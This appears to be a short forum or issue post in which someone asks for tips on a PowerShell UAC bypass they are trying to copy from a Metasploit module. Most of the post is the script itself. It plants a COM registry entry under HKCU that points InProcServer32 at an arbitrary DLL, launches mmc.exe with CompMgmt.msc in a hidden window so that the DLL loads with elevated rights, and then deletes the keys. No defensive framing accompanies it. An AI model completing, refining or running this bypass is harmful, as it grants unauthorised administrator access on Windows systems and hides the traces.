Description
Hi there. I was wondering if you could give me any tips on making a powershell script for this UAC bypass. I've tried to copy the metasploit module but I've got nowhere. function ComBypass{
param(
[Parameter(Mandatory = $False)]
[String]$dllFile
)
$rootKey="HKCU:\SOFTWARE\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}"
$inproc_key = "$rootKey\InProcServer32"
$shell_key = "$rootKey\ShellFolder"
New-Item $rootKey -Force
New-Item $inproc_key
New-Item $shell_key
New-ItemProperty -Path $inproc_key -Name "(Default)" -Value $dllFile
New-ItemProperty -Path $inproc_key -Name 'ThreadingModel' -Value 'Apartment'
New-ItemProperty -Path $inproc_key -Name 'LoadWithoutCOM' -Value ''
New-ItemProperty -Path $shell_key -Name 'HideOnDesktop' -Value ''
New-ItemProperty -Path $shell_key -Name 'Attributes' -PropertyType 'DWord' -Value 0xf090013d
Start-Process -File cmd.exe -ArgumentList "/c mmc.exe CompMgmt.msc" -WindowStyle Hidden
Start-Sleep -Seconds 10
Remove-Item -Path $rootKey -Force -Recurse
}
ComBypass -dllFile "C:\cmd.dll"